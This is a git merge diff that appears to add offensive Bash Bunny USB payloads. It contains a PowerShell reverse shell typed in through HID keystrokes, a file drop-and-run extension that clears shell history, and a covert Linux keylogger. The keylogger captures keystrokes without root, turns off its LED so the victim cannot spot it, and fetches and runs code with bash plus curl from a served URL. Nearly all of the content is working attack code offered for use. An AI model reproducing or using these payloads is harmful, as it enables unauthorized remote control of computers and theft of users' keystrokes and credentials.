Merge c951bd10d1 into 8d901a02a8

[Extension + Payload] The Ol'Drop'n'Run

READEME.md

@@ -0,0 +1,25 @@
+A simple reverse shell for the Bash Bunny. I use it to connect to a Lightsail server. Just enter the IP and Port of the listener. Listener command nc -lnvp then port number. Put payload in switch folder.
+
+Heres the code. Happy Hacking.
+
+#TITLE. ReverseShellBunny #AUTHOR.DarkStorme #Reverse Shell for the Bash Bunny
+
+#!/bin/bash
+
+Set attack mode to HID
+ATTACKMODE HID
+
+LED attack indication
+LED ATTACK
+
+Open PowerShell
+QUACK GUI r QUACK DELAY 500 QUACK STRING powershell.exe QUACK DELAY 500 QUACK ENTER QUACK DELAY 2000
+
+Define the PowerShell payload
+PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'
+
+Send the PowerShell payload
+QUACK STRING "$PS_PAYLOAD" QUACK ENTER QUACK DELAY 5000 QUACK GUI d
+
+LED finish indication
+LED FINISH

payload.txt

@@ -0,0 +1,31 @@
+#TITLE. ReverseShellBunny
+#AUTHOR.DarkStorme
+#Reverse Shell for the Bash Bunny
+
+#!/bin/bash
+
+# Set attack mode to HID
+ATTACKMODE HID
+
+# LED attack indication
+LED ATTACK
+
+# Open PowerShell
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell.exe
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 2000
+
+# Define the PowerShell payload
+PS_PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",PORT);$stream = $client.GetStream();$bytes = New-Object byte[] 65536;while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = [System.Text.Encoding]::ASCII.GetString($bytes, 0, $i);$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback);$stream.Write($sendbyte, 0, $sendbyte.Length);$stream.Flush()};$client.Close()'
+
+# Send the PowerShell payload
+QUACK STRING "$PS_PAYLOAD"
+QUACK ENTER
+QUACK DELAY 5000
+QUACK GUI d
+
+# LED finish indication
+LED FINISH

payloads/extensions/drop.sh

@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# DROP v1 by bg-wa
+# Simplifies dropping files from HID attacks for LINUX
+# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
+#
+# Example:
+# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
+source ./run.sh
+
+function DROP() {
+    os=$1
+    source=$2
+    destination=$3
+    overwrite=$4
+    executable=$5
+
+    case "$os" in
+      WIN)
+             RUN WIN powershell
+         ;;
+      OSX)
+             RUN OSX terminal
+         ;;
+      UNITY)
+             RUN UNITY terminal
+         ;;
+      LINUX)
+             RUN LINUX terminal
+         ;;
+      *)
+             RUN UNITY terminal
+         ;;
+   esac
+
+    QUACK DELAY 1000
+
+    if "$overwrite" == "true"
+    then
+        case "$os" in
+          WIN)
+                 QUACK STRING del "$destination"
+             ;;
+          *)
+                 QUACK STRING rm "$destination"
+             ;;
+        esac
+        QUACK ENTER
+        QUACK DELAY 500
+    fi
+
+    case "$os" in
+      WIN)
+            QUACK STRING fsutil file createnew "$destination"
+            QUACK ENTER
+            QUACK DELAY 500
+            QUACK STRING notepad.exe "$destination"
+            QUACK ENTER
+            QUACK DELAY 1000
+         ;;
+      *)
+            QUACK STRING vi "$destination"
+            QUACK ENTER
+            QUACK DELAY 500
+            QUACK STRING i
+         ;;
+    esac
+
+    while IFS= read -r data
+    do
+        QUACK STRING "$data"
+        QUACK ENTER
+    done < "$source"
+
+    QUACK DELAY 500
+
+    case "$os" in
+      WIN)
+             QUACK CTRL s
+             QUACK CRTL x
+         ;;
+      *)
+            QUACK ESC
+            QUACK ENTER
+            QUACK STRING :wq
+            QUACK ENTER
+
+            if "$executable" == "true"
+            then
+                 QUACK STRING chmod +x "$destination"
+                QUACK ENTER
+                QUACK DELAY 500
+            fi
+
+            QUACK STRING history -c
+            QUACK ENTER
+            QUACK STRING exit
+            QUACK ENTER
+         ;;
+    esac
+}
+
+export -f DROP

payloads/extensions/prompt.sh

@@ -0,0 +1,126 @@
+#!/bin/bash
+
+################################################################################
+# Quickly get to a prompt on any platform with the BashBunny
+#
+# How this works?
+# 1) Once the library is included in your payload, launch terminal\powershell\run
+#    with:
+#       PROMPT [OS]
+# 2) OS options are:
+#       "AUTO"       : Default - Hak5 2124 cross platform code
+#       "UNITY"      : Launches Terminal in Unity
+#       "UNITY_RUN"  : Opens run prompt in Unity
+#       "MAC"        : Launches Terminal in OSX
+#       "POWERSHELL" : Launches Powershell in Windows
+#       "WINDOWS_RUN": Opens run prompt in Windows
+# 3) To close a prompt use:
+#       CLOSE_PROMPT [OS]
+################################################################################
+
+################################################################################
+# Start HID Prompt
+################################################################################
+
+
+function PROMPT() {
+if [ -z "$1" ]; then
+    OS="AUTO"
+else
+    OS=$1
+fi
+
+#AUTO
+if [ "${OS}" = "AUTO" ]; then
+    LED G B 100
+    QUACK ALT F2
+    QUACK DELAY 50
+    QUACK GUI SPACE
+    QUACK DELAY 50
+    QUACK GUI r
+    clear_active_input
+    wait_enter_wait 200 1000
+fi
+
+#UNITY
+if [ "${OS}" = "UNITY" ]; then
+    LED R B 100
+    QUACK GUI
+    clear_active_input
+    QUACK STRING terminal
+    wait_enter_wait 200 1000
+fi
+
+#UNITY_RUN
+if [ "${OS}" = "UNITY_RUN" ]; then
+    LED R B 100
+    QUACK ALT F2
+fi
+
+#MAC
+if [ "${OS}" = "MAC" ]; then
+    LED R B G 100
+    QUACK GUI SPACE
+    clear_active_input
+    QUACK STRING terminal
+    wait_enter_wait 200 1000
+fi
+
+#POWERSHELL
+if [ "${OS}" = "POWERSHELL" ]; then
+    LED B 100
+    QUACK GUI
+    QUACK DELAY 500
+    QUACK powershell
+    wait_enter_wait 200 1000
+fi
+
+#WINDOWS_RUN
+if [ "${OS}" = "WINDOWS_RUN" ]; then
+    LED B 100
+    QUACK GUI r
+    QUACK DELAY 500
+fi
+
+LED 0
+
+}
+
+function CLOSE_PROMPT() {
+    if [ -z "$1" ]; then
+        QUACK ALT F4
+    else
+        if [ "$1" = "MAC" ]; then
+            QUACK GUI w
+        else
+             QUACK ALT F4
+         fi
+    fi
+}
+
+# HELPER FUNCTIONS
+function wait_enter_wait() {
+    if [ -z "$1" ]; then
+        BEFORE_WAIT=100
+    else
+        BEFORE_WAIT=$1
+    fi
+    if [ -z "$2" ]; then
+        AFTER_WAIT=100
+    else
+        AFTER_WAIT=$2
+    fi
+
+    QUACK DELAY ${BEFORE_WAIT}
+    QUACK ENTER
+    QUACK DELAY ${AFTER_WAIT}
+}
+
+function clear_active_input() {
+    QUACK DELAY 50
+    QUACK BACKSPACE
+    QUACK DELAY 100
+}
+
+export -f PROMPT
+export -f CLOSE_PROMPT

payloads/library/execution/drop_n_run/fuse.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Wake up and do something productive here instead...
+sleep 10
+
+# boom!!
+firefox "http://hak5.org"

payloads/library/execution/drop_n_run/payload.txt

@@ -0,0 +1,30 @@
+#!/bin/bash
+#
+# Title:         The Ol'Drop'n'Run
+# Author:        bg-wa
+# Version:       1.0
+# Category:      HID
+# Target:        UNITY
+# Attackmodes:   HID
+#
+# Quick HID only attack to write a file to target machine and open
+#
+# | Attack Stage        | Description                              |
+# | ------------------- | ---------------------------------------- |
+# | SETUP               | Open vi                                  |
+# | ATTACK              | Writing files                            |
+# | FINISH              | Payload Dropped & ran (remove the bunny) |
+#
+
+ATTACKMODE HID
+LED SETUP
+
+source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
+target_script=\~/fuse.sh
+
+LED ATTACK
+
+DROP $source_script $target_script true true
+RUN UNITY $target_script
+
+LED FINISH

payloads/library/recon/KeyLogger/Linux.sh

@@ -0,0 +1,20 @@
+#/bin/bash
+checkonbunny() {
+    mybunny=$(lsblk -p -S -o  NAME,SERIAL | grep $BunnyID | awk '{print $1}')
+    mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
+    if [ -d $mybunny ]; then
+	bashbunnyloot=$mybunny"/loot"
+	mapfile=$bashbunnyloot"/maps" 
+	keyfile=$bashbunnyloot"/keys" 
+	startwork
+    fi
+}
+startwork(){
+    getdevicetouse=${getdevicetouse#"id="}
+    xinput --test $getdevicetouse > $keyfile &
+    xmodmap -pke > $mapfile 
+}
+BunnyID="ch000001"
+bashbunnyloot=''
+getdevicetouse=$(xinput |grep keyboard | sed 's/slave  keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
+[[ -z $getdevicetouse ]] || checkonbunny

payloads/library/recon/KeyLogger/Readme.md

@@ -0,0 +1,28 @@
+# Keylogger For Bash Bunny
+
+Author: TheDragonkeeper
+
+Version: Version 1
+
+## Description
+
+Dirty keylogger.  Runs a webserver to pull code from for multiOS targeting
+
+Captures all keyboard input without the need for root access
+Uses the user keyboard map file for decoding the captured data
+
+## STATUS
+
+| LED              | Status                                                                        |
+| ---------------- | ----------------------------------------------------------------------------- |
+| Blue flash       | Booting                                                                       |
+| Red slow         | Waiting on webserver                                                          |
+| Blue Fast        | Identifying Target and deploying accordingly                                  |
+| LED OFF          | Capturing data, no led for victim to spot, waiting for switch position change |
+| LED Red Fast     | Decoding keys, Then doing any cleanup required                                |
+| Green flashing   | Task complete, ready to unplug                                                |
+
+Still WIP, Currently supports linux (tested on ubuntu)
+If you want to add payloads for OSX or Windows place them into the switch folder then,
+Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41  in payload.txt
+

payloads/library/recon/KeyLogger/payload.txt

@@ -0,0 +1,43 @@
+TARGET_OS='LINUX'
+
+LED B 100
+ATTACKMODE HID STORAGE ECM_ETHERNET
+sleep 3
+LED R SLOW
+GET HOST_IP
+GET SWITCH_POSITION
+udisk mount
+cd /root/udisk/payloads/$SWITCH_POSITION/
+python webserver.py &
+while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
+LED B FAST
+[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
+[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
+[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
+[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
+LED
+WAIT
+LED R 0
+cd /root/udisk/loot
+keystate=''
+_ctrl='0'
+_alt='0'
+_shift='0'
+for line in $(cat 'keys')
+do
+	if [ $line != 'key' ]; then
+		if [ $line == 'press' ] || [ $line == 'release' ]; then
+			keystate=$line
+		else
+			_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
+			searchparams='keycode'"$_spaces"$line
+			key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
+			echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift"  "$keystate"  "$key >> 'decoded'
+			
+		fi
+	fi
+done
+[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
+[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
+[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
+LED G 0

payloads/library/recon/KeyLogger/webserver.py

@@ -0,0 +1,28 @@
+#!/usr/bin/python
+from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
+from os import curdir, sep
+PORT_NUMBER = 8080
+class myHandler(BaseHTTPRequestHandler):
+	def do_GET(self):
+		if self.path=="/":
+			self.path="/"
+		try:
+			sendReply = False
+			if self.path.endswith(".sh"):
+				mimetype='text/plain'
+				sendReply = True
+			if sendReply == True:
+				f = open(curdir + sep + self.path) 
+				self.send_response(200)
+				self.send_header('Content-type',mimetype)
+				self.end_headers()
+				self.wfile.write(f.read())
+				f.close()
+			return
+		except IOError:
+			self.send_error(404,'File Not Found: %s' % self.path)
+try:
+	server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
+	server.serve_forever()
+except KeyboardInterrupt:
+	server.socket.close()